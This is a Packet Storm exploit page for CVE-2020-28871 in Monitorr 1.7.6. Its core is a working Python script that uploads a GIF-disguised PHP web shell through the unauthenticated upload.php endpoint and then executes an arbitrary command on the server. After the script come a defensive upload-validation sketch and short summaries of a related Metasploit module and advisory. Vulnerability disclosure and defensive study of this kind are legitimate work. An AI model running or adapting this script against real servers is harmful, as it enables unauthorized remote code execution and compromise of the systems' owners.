Monitorr 1.7.6 Shell Upload

Monitorr version 1.7.6 remote shell upload proof of concept exploit written in Python.

Packet Storm
#vulnerability#ubuntu#git#php#rce#auth
```python
# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability
# CVE: CVE-2020-28871

import requests
import random
import string
#from requests.auth import HTTPBasicAuth
from colorama import (Fore as F, Back as B, Style as S)

BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT

def payL():
    fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'
    tf1=requests.post(url+'/assets/php/upload.php',
        files=(
            ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),))
    tf2=requests.get(url+'/assets/data/usrimg/'+fileName)
    print(tf2.text)

def sig():
    SIG  = SB+FY+"         "+FR+".-----..___.._____.      "+FY+"\n"
    SIG += FY+"         |  ..   >||__-__-_|         \n"
    SIG += FY+"         "+FR+"|  |.'  ,||_______          "+FY+"\n"
    SIG += FY+"         |    _ < ||__-__-_|"+FR+"*  *  *"+FY+" \n"
    SIG += FY+"         |  |\  \ ||__-__-_\n"
    SIG += FY+"         "+FR+"|___ \_ \||_______| "+FY+"\n"
    SIG += FY+"\n"+"    _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST
    return SIG

def argsetup():
    about  = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST
    return about

if __name__ == "__main__":
    header = SB+FT+"\n"+'             '+FR+'retrymp3\n'+ST
    print(header)
    print(sig())
    print(argsetup())
    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    url=input("Enter the base url: ")
    cmd=input("Command: ")
    payL()
```
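An added example, not part of the original exploit or of Monitorr's code: a Python sketch of server-side upload validation that rejects a file shaped like the PoC's (a `.php` name whose body begins with `GIF87a`) and shows why a check on leading bytes alone accepts it. The allowlist, the function names and the sample bytes are assumptions constructed for illustration.

```python
import os
import re
import secrets

# Assumption: the upload feature only needs these image types.
ALLOWED = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def magic_only_check(data: bytes) -> bool:
    """Weak check: accepts anything that merely starts like an image."""
    return any(data.startswith(sigs) for sigs in ALLOWED.values())


def validate_upload(client_name: str, data: bytes):
    """Return (ok, reason, stored_name) for an uploaded file."""
    # Drop any client-supplied directory part, then take the final extension.
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    if PHP_TAG.search(data):
        return False, "embedded PHP open tag", None
    # Store under a server-generated name so the client controls neither the
    # path nor any inner extension (e.g. "x.php.gif").
    return True, "ok", secrets.token_hex(16) + ext


# Constructed samples: a harmless stand-in with the PoC's shape, and a GIF stub.
POC_SHAPED = b"GIF87a\n<?php echo 'marker'; ?>"
GIF_STUB = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"

if __name__ == "__main__":
    print(magic_only_check(POC_SHAPED))
    print(validate_upload("abcdefghijklmnop.php", POC_SHAPED))
    print(validate_upload("abcdefghijklmnop.gif", POC_SHAPED))
    print(validate_upload("logo.gif", GIF_STUB))
```

Content checks can miss payloads, so serving the upload directory with script execution disabled is a complementary control.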

Related news

Monitorr 1.7.6m / 1.7.7d Remote Code Execution

This Metasploit module exploits an arbitrary file upload vulnerability and achieves remote code execution in the Monitorr application. Using a specially crafted request, custom PHP code can be uploaded and injected through the upload.php endpoint because of missing input validation. A user with any privilege level can exploit this vulnerability, which results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data). Monitorr versions 1.7.6m, 1.7.7d, and below are affected.

CVE-2020-28871: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6 – Lyhins' Lab

Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server side via an insecure file upload.
